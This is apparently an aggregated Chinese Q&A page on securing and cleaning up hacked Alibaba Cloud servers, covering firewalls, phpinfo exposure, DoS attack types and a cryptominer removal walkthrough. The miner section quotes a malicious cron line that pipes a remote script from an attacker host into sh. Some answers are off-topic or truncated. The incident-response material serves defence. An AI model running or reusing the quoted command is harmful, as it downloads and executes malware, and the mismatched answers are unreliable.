阿里雲伺服器暴露怎麼處理

『壹』 我的阿里雲伺服器怎麼能保證安全不被人攻擊啊

防止阿里雲伺服器不被攻擊：
首先系統內部安全要做好，系統漏洞補丁要打好，防火牆的策略、開放那些埠訪問，允許那些IP訪問，這些基本的設置要做好。
使用一些專業的安全漏洞掃描工具，阿里雲自己有一個安全分析工具叫態勢感知，利用工具可以分析發現潛在的入侵和高隱蔽性攻擊威脅。
使用一些管理工具管理阿里雲主機，可以很方便的管理阿里雲主機，可以設置管理成員的許可權，防止管理混亂，減少對外埠開放，還附帶安全漏洞檢查。
遭遇到DDoS攻擊，需要購買第三方防DDoS攻擊的服務，阿里雲市場裡面有雲盾DDoS、東軟、伺服器安全加固及優化等一些防攻擊的產品。

『貳』 阿里雲ECS伺服器對外攻擊，怎麼解決

伺服器被黑了，保存數據，重做系統。伺服器

『叄』 阿里雲伺服器提示超出當前范圍怎麼解決

阿里雲伺服器提示超出當前范圍怎麼解決
先檢查SP在查詢分析器中執行有沒有問題。
不要動態創建釋放資料庫訪問控制項。應該預先創建好，然後重復調用即可。 解析度和頻幕刷新率的問題。開機的時候就按F8，進入安全模式，把解析度和刷新頻率都修改成默認的。

『肆』 阿里雲伺服器系統配置泄露怎麼辦phpinfo.php

知道你安裝路徑及PHP版本模塊的版本 特別是有漏洞的版本伺服器很容易被入侵
如果phpinfo能暴露，就說明目錄保護做的不好，容易被上傳木馬，會有一定危害 畢竟把你系統一些信息暴露了 讓人有機可乘

『伍』 伺服器報漏洞怎麼解決

系統漏洞會影響到的范圍很大，包括系統本身及其支撐軟體，網路客戶和伺服器軟體，網路路由器和安全防火牆等。
騰訊電腦管家可以修復Windows操作系統漏洞，還可以智能篩選區分出高危漏洞補丁及功能性補丁，操作方法：騰訊電腦管家-工具箱-選擇「修復漏洞」。

『陸』 阿里雲的伺服器給攻擊了，這種問題怎麼解決

伺服器受攻擊的方式主要有以下幾種：
1．數據包洪水攻擊
一種中斷伺服器或本地網路的方法是數據包洪水攻擊，它通常使用Internet控制報文協議（ICMP）包或是UDP包。

2．磁碟攻擊
這是一種更殘忍的攻擊，它不僅僅影響目標計算機的通信，還破壞其硬體。偽造的用戶請求利用寫命令攻擊目標計算機的硬碟，讓其超過極限，並強制關閉。

3．路由不可達
通常，DoS攻擊集中在路由器上，攻擊者首先獲得控制權並操縱目標機器。當攻擊者能夠更改路由器的路由表條目的時候，會導致整個網路不可達。這種攻擊是非常陰險的，因為它開始出現的時候往往令人莫名其妙。

『柒』 阿里雲伺服器，提示web漏洞，跨站攻擊，請問如何處理

修復相關程序漏洞，或者安裝網路加速樂、安全狗之類伺服器防禦軟體。同時可以用多備份時刻最好數據備份，以免被攻擊造成數據丟失，網站有漏洞還會發郵件提醒，反正有備無患吧

『捌』 阿里雲伺服器漏洞修復怎麼修復

這種提示我見過很多，基本上每個客戶都有這個提示，可以不用理會，你看看提示內容就知道了，都是系統的，你網站有後門被篡改跟這個關系不大，除非高危的，一般給別人處理安全問題都是程序問題比較多，你網站有安全問題可以找額給你解決，後面就不會被篡改了

『玖』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.